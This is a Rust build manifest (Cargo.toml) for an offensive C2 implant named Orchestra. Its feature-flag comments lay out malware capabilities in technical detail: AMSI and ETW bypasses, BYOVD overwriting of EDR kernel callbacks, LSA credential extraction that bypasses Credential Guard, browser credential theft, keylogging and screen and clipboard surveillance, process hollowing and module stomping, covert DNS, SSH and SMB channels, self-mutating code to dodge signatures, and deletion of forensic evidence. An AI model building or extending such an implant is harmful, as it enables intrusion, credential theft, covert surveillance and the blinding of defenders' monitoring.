[package]
name = "agent"
description = "Orchestra implant — multi-transport C2 agent with sleep obfuscation, injection engine, and plugin support"
version.workspace = true
edition.workspace = true
license.workspace = true

[dependencies]
chacha20 = "0.9"
bincode = "1.3"
base32 = "0.4.0"
sha2 = { workspace = true }
hmac = "0.12"
hex = "0.4"
reqwest = { version = "0.11", default-features = false, features = ["rustls-tls", "json"] }
junk_macro = { path = "../junk_macro" }
pe_resolve = { path = "../pe_resolve" }
string_crypt = { path = "../string_crypt" }
common = { path = "../common" }
log = "0.4"
tokio = { workspace = true }
tracing = { workspace = true }
tracing-subscriber = { workspace = true }
sysinfo = { workspace = true }
anyhow = { workspace = true }
portable-pty = "0.9"
dirs = "5.0"
lazy_static = "1.4"
uuid = { version = "1.0", features = ["v4"] }
base64 = { workspace = true }
serde_json = "1.0"
serde = { workspace = true }
module_loader = { path = "../module_loader" }
optimizer = { path = "../optimizer" }
code_transform = { path = "../code_transform", optional = true }
goblin = { version = "0.7", default-features = false, features = ["elf64", "elf32", "endian_fd"], optional = true }
toml = "1.1.2"
directories = "6.0.0"
# rustls 0.23 is used by the agent's direct TLS (outbound, SSH transport, etc.)
rustls = { version = "0.23.38", default-features = false, features = ["ring", "std", "logging", "tls12"] }
# rustls 0.21 is the version reqwest 0.11 depends on; needed to build a custom
# ServerCertVerifier for certificate pinning that is compatible with reqwest's
# use_preconfigured_tls() API.
rustls_0_21 = { package = "rustls", version = "0.21", default-features = false, features = ["dangerous_configuration"] }
tokio-rustls = { version = "0.26.4", default-features = false, features = ["ring", "logging", "tls12"] }
rustls-pemfile = "2.2.0"
rustls-native-certs = "0.8"
rcgen = { version = "0.14.7", default-features = false, features = ["crypto", "ring", "pem"] }
rand = "0.8"
url = "2"
thiserror = { workspace = true }
libc = "0.2.185"
once_cell = "1.21.4"
zeroize = { version = "1.8.2", features = ["zeroize_derive"] }
chacha20poly1305 = "0.10"
x25519-dalek = { version = "2", features = ["static_secrets"] }
hkdf = { version = "0.12" }
ed25519-dalek = { version = "2", features = ["rand_core"] }
aes-gcm = "0.10"
aes = "0.9.0"
ctr = "0.10.0"
async-trait = "0.1.89"
winapi = { version = "0.3", features = ["ntdef", "psapi", "threadpoolapiset", "threadpoollegacyapiset", "memoryapi", "winnt", "ntsecapi", "sspi"] }
russh = { version = "0.46", optional = true }
russh-keys = { version = "0.46", optional = true }
notify = { version = "6.1", optional = true }

[target.'cfg(target_os = "linux")'.dependencies]
x11cap = { version = "0.1", optional = true }
enigo = { version = "0.2", optional = true, default-features = false, features = ["x11rb"] }
image = { version = "0.25", optional = true }
zbus = { version = "4", optional = true, default-features = false, features = ["tokio"] }
futures-util = { version = "0.3", optional = true, default-features = false }

[target.'cfg(target_os = "macos")'.dependencies]
enigo = { version = "0.2", optional = true }

[target.'cfg(windows)'.dependencies]
enigo = { version = "0.2", optional = true }
winreg = "0.52"
image = { version = "0.25", optional = true }
winapi = { version = "0.3", features = ["debugapi", "processthreadsapi", "memoryapi", "sysinfoapi", "winbase", "winnt", "libloaderapi", "winreg", "winnls", "wow64apiset", "handleapi", "iphlpapi", "iptypes", "fileapi", "synchapi", "minwinbase", "tlhelp32", "combaseapi", "objbase", "wingdi", "winuser", "oleauto", "oaidl", "objidl", "rpcdce", "rpcndr", "dpapi", "wincrypt", "errhandlingapi", "namedpipeapi"] }
hollowing = { path = "../hollowing" }
nt_syscall = { path = "../nt_syscall" }

[features]
p2p-tcp = []
ppid-spoofing = []
stealth = ["direct-syscalls", "unsafe-runtime-rewrite", "memory-guard", "ppid-spoofing"]
dev = []
hot-reload = ["notify"]
env-validation = []
persistence = []
network-discovery = []
# `dep:x11cap` only resolves when compiling for Linux (see
# `[target.'cfg(target_os = "linux")'.dependencies]`); on Windows it is a
# no-op feature activation because the optional dep is absent from the
# target-specific dependency table.
remote-assist = ["dep:enigo", "dep:image", "dep:x11cap", "dep:zbus", "dep:futures-util"]
module-signatures = ["common/module-signatures"]
direct-syscalls = []
# Pre-injection ETW auto-logger enumeration via registry (NtOpenKey /
# NtEnumerateKey / NtQueryValueKey).  When disabled, check_etw_trace()
# returns EtwStatus::Unknown immediately with no registry access.
etw-check = []
# Spoof the user-mode call stack visible to EDR kernel callbacks during
# indirect syscall dispatch.  Before jumping to the ntdll syscall gadget
# a two-entry fake frame chain is pushed onto the stack so that stack walkers
# see ntdll!NtQuerySystemTime as the immediate caller rather than agent code.
# Requires (and implies) the `direct-syscalls` feature; only active on
# Windows x86-64.
stack-spoof = ["direct-syscalls"]
manual-map = ["module_loader/manual-map"]
traffic-normalization = []
perf-optimize = []
# Capture human-computer-interaction telemetry (key/mouse events, timing).
# On Linux this uses rdev's default X11/libinput backend.  Compile with the
# companion `evdev` feature to switch to the kernel evdev-rs backend instead;
# evdev avoids X11 but requires libtool + a full autotools chain at build time
# (autoconf, automake, libtool must be installed; see README.md §Build Dependencies).
hci-research = ["dep:rdev", "dep:chrono", "dep:twox-hash"]
# Use the Linux evdev-rs (kernel evdev) backend for rdev instead of X11/libinput.
# Only meaningful when hci-research is also enabled. Requires libtool at build time.
# Build: cargo build --features hci-research,evdev
evdev = ["rdev/evdev-rs"]
# Connect the agent outbound to an Orchestra Control Center instead of waiting
# for an inbound connection from a console. The server address and PSK are
# baked in at compile time via the ORCHESTRA_C_ADDR / ORCHESTRA_C_SECRET build
# env vars (set automatically by the Builder when outbound-c is included in a
# profile). Debug builds may override them with ORCHESTRA_C / ORCHESTRA_SECRET.
outbound-c = []
# Application-layer perfect forward secrecy via X25519 ECDH + HKDF.
# When enabled, each session derives a unique AES-256-GCM key from an
# ephemeral DH exchange authenticated by the PSK.
forward-secrecy = ["common/forward-secrecy"]
unsafe-runtime-rewrite = ["optimizer/unsafe-runtime-rewrite"]
# Encrypt all designated sensitive memory regions while the agent is idle.
# Uses XChaCha20-Poly1305.  The 32-byte key is held in CPU registers (x86-64
# XMM lanes via inline asm) for the duration of the idle window so that a
# memory dump taken while the agent is sleeping reveals only ciphertext.
memory-guard = []
# Activate the DNS-over-HTTPS covert transport (c2_doh::DohTransport).
# When enabled and dns_over_https=true is set in agent.toml, the agent
# tunnels C2 traffic through DNS TXT queries sent to a DoH resolver.
# The server-side DoH listener is provided by orchestra-server
# (see doh_listener module). Enable doh_enabled=true in the server
# configuration to activate it.
doh-transport = []
# Activate the HTTP malleable-profile transport (c2_http::HttpTransport).
# When enabled and cdn_relay=true is set in agent.toml, the agent tunnels
# C2 traffic over HTTP/S using the malleable profile headers/URIs.
http-transport = []
# Browser stored-data recovery: Chrome (including App-Bound Encryption v127+),
# Edge, and Firefox.  Windows-only.  No extra crate dependencies beyond what is
# already in the agent dependency tree.
browser-data = []
# LSA Whisperer — credential extraction via LSA SSP interfaces.
# Interacts with LSA authentication packages through documented interfaces,
# operating within the LSA process's own security context.  Bypasses Credential
# Guard and RunAsPPL.  Windows-only.  No extra crate dependencies.
lsa-whisperer = []# Surveillance capabilities: screenshot capture (multi-monitor), keylogger
# (WH_KEYBOARD_LL with encrypted buffer), and clipboard monitoring (polling
# thread with encrypted buffer).  Pulls in `dep:image` for PNG encoding.
surveillance = ["dep:image"]# Activate the SSH covert transport (c2_ssh::SshTransport).
# When enabled and ssh_host is set in agent.toml, the agent tunnels C2
# traffic through an SSH session channel.  Add russh and russh-keys to the
# dependency set; requires no native OpenSSL library — all crypto is
# pure-Rust.
ssh-transport = ["dep:russh", "dep:russh-keys"]
# Activate the SMB/TCP named-pipe covert transport (c2_smb::SmbPipeTransport).
# When enabled and smb_pipe_enabled=true is set in agent.toml, the agent
# tunnels C2 traffic through a Windows named pipe.  Two modes are supported:
# "smb" (direct named-pipe connection via NT syscalls, Windows-only) and
# "tcp_relay" (connects to a local TCP relay that bridges to the pipe).
# The server-side SMB relay is provided by orchestra-server
# (see smb_relay module).
smb-pipe-transport = []
# Use hardware-breakpoint (DR0/DR1 + VEH) AMSI/ETW bypass instead of the
# default memory-patch approach.  The HWBP strategy is stealthier (no .text
# modification) but is only needed when memory-patching is blocked by CFG or
# similar mitigations.  Default (without this feature) is the memory-patch
# approach from amsi_defense.rs, which leaves no environment-variable trace.
hwbp-amsi = []
# AMSI Write-Raid bypass: spawns a race thread that continuously overwrites the
# AmsiInitFailed flag in amsi.dll's .data section, causing all subsequent
# AmsiScanBuffer calls to return AMSI_RESULT_CLEAN without code patching.
# Zero VirtualProtect calls, zero .text modifications, zero hardware
# breakpoints.  Most stealthy AMSI bypass available.
write-raid-amsi = []
# Continuous memory hiding ("Evanesco"): keeps all pages NOT actively being
# executed in an encrypted/PAGE_NOACCESS state at ALL times, not just during
# sleep.  Per-page RC4 encryption with a background re-encryption thread,
# VEH-based auto-decryption, and RAII PageGuard for JIT access.  Works as an
# additional layer alongside the existing XChaCha20-Poly1305 sleep encryption.
# Windows-only (uses NtProtectVirtualMemory, VEH).
evanesco = []
# Kernel callback overwrite (BYOVD): surgically overwrite EDR kernel callback
# function pointers to point to a `ret` instruction instead of NULLing them.
# Defeats EDR self-integrity checks (CrowdStrike, Defender) that verify their
# callbacks are still registered by checking if the pointer is non-NULL.
# A ret pointer passes these checks (non-NULL, valid executable memory) but
# causes the callback to immediately return without executing any monitoring
# logic.  Requires (and implies) `direct-syscalls`.  Windows-only.
kernel-callback = ["direct-syscalls"]
# Embed XOR-encrypted vulnerable driver bytes at compile time.  When enabled,
# the ORCHESTRA_DRIVER_PATH environment variable MUST be set to the path of the
# encrypted driver file.  If not set, compilation fails with a clear error.
# Example:
#   ORCHESTRA_DRIVER_PATH=resources/drivers/dbutil_2_3_xor_encrypted.bin \
#       cargo build --features embedded_driver
# When disabled (default), a minimal placeholder driver stub is included instead.
embedded_driver = []
# Self-re-encoding ("Metamorphic Lite"): periodically re-encode the agent's own
# .text section at runtime using the code_transform pipeline with a fresh seed
# derived from a C2-supplied nonce and the current timestamp.
self-reencode = ["dep:code_transform", "dep:goblin"]
# Automated EDR bypass transformation engine: scans the agent's own .text
# section for byte signatures known to be detected by EDR (YARA rules, entropy
# heuristics, known gadget chains like "4C 8B D1 B8" for direct syscall stubs).
# When a detected pattern is found, applies semantic-preserving transformations
# automatically at runtime: instruction substitution, register reassignment,
# nop sled insertion with semantic-equivalent nops, constant splitting, and
# jump obfuscation.  Supplements self-reencoding (handles PATTERN AVOIDANCE
# before and after morphing).  Requires (and implies) `self-reencode`.
evasion-transform = ["self-reencode"]
# NTFS transaction-based process hollowing: creates an NTFS transaction via
# NtCreateTransaction, creates a section backed by the transaction, writes
# payload into a suspended target process, then rolls back the transaction
# so the file on disk never existed.  The section mapping in the target
# process remains valid.  Includes ETW blinding with spoofed provider GUIDs.
# Falls back to RtlCreateTransaction via kernel32 ordinal if NtCreateTransaction
# SSN is unavailable.  Requires (and implies) `direct-syscalls`.  Windows-only.
transacted-hollowing = ["direct-syscalls"]

# Delayed module-stomp injection: loads a sacrificial DLL into the target
# process, waits for a configurable delay (default 8–15 seconds randomized)
# to let EDR initial-scan heuristics pass, then overwrites the DLL's .text
# section with the payload.  Defeats timing-based EDR heuristics that flag
# modules whose code changes shortly after loading.  Two-phase: Phase 1 loads
# the DLL and returns immediately; Phase 2 stomps and executes after delay.
# Requires (and implies) `direct-syscalls`.  Windows-only.
delayed-stomp = ["direct-syscalls"]

# User-mode NT kernel interface emulation: routes configured Nt* syscalls
# through kernel32/advapi32 equivalents instead of ntdll syscall stubs.
# Makes the agent invisible to EDR hooks on ntdll AND to ntdll unhooking
# detection.  Call stacks show kernel32!WriteProcessMemory etc. — looks
# like legitimate API usage.  Falls back to existing indirect syscall path
# when kernel32 equivalent fails.  Requires (and implies) `direct-syscalls`.
# Windows-only.
syscall-emulation = ["direct-syscalls"]

# CET (Control-flow Enforcement Technology) / Shadow Stack bypass: handles
# Windows 11 24H2+ hardware-enforced shadow stacks that defeat return-address
# spoofing and stack pivoting.  Three strategies: (1) disable CET via process
# mitigation policy, (2) CET-compatible call chain building, (3) VEH-based
# shadow stack fix (experimental, requires kernel access).  Integrates with
# the existing stack-spoofing code in syscalls.rs by adding a CET-awareness
# check at the entry point.  Requires (and implies) `direct-syscalls`.
# Windows-only.
cet-bypass = ["direct-syscalls"]

# Token-only impersonation via NtImpersonateThread / SetThreadToken:
# bypasses ImpersonateNamedPipeClient detection by extracting the
# impersonation token through a helper thread and applying it to the
# main thread via NtSetInformationThread(ThreadImpersonationToken).
# Alternative strategy uses DuplicateTokenEx + SetThreadToken directly.
# Includes encrypted token cache, auto-revert on task completion, and
# integration with lsass_harvest and P2P SMB pipe connections.
# Requires (and implies) `direct-syscalls`.  Windows-only.
token-impersonation = ["direct-syscalls"]

# Forensic cleanup — Windows Prefetch evidence removal: cleans .pf files
# after injection or on-demand to prevent forensic timeline analysis.
# Three methods: (1) delete via NtDeleteFile, (2) patch header in-place
# via NtCreateSection + NtMapViewOfSection (preferred — file remains but
# contains no useful forensic data), (3) disable Prefetch service via
# registry.  Also cleans USN journal entries referencing the .pf file.
# Hooks into injection_engine post-injection for automatic cleanup.
# Requires (and implies) `direct-syscalls`.  Windows-only.
forensic-cleanup = ["direct-syscalls"]

[[bin]]
name = "agent-standalone"
path = "src/main.rs"

# rdev: event-capture backend for hci-research.  Default features use
# X11/libinput on Linux (no autotools required).  When the `evdev` feature
# is also enabled, rdev activates its evdev-rs backend instead (see §evdev above).
[dependencies.rdev]
version = "0.5"
optional = true

[dependencies.chrono]
version = "0.4"
optional = true

[dependencies.twox-hash]
version = "1.6"
optional = true

[dev-dependencies]
criterion = "0.8.2"
rcgen = "0.14.7"
tempfile = "3.27.0"

[[bench]]
name = "agent_benchmark"
harness = false
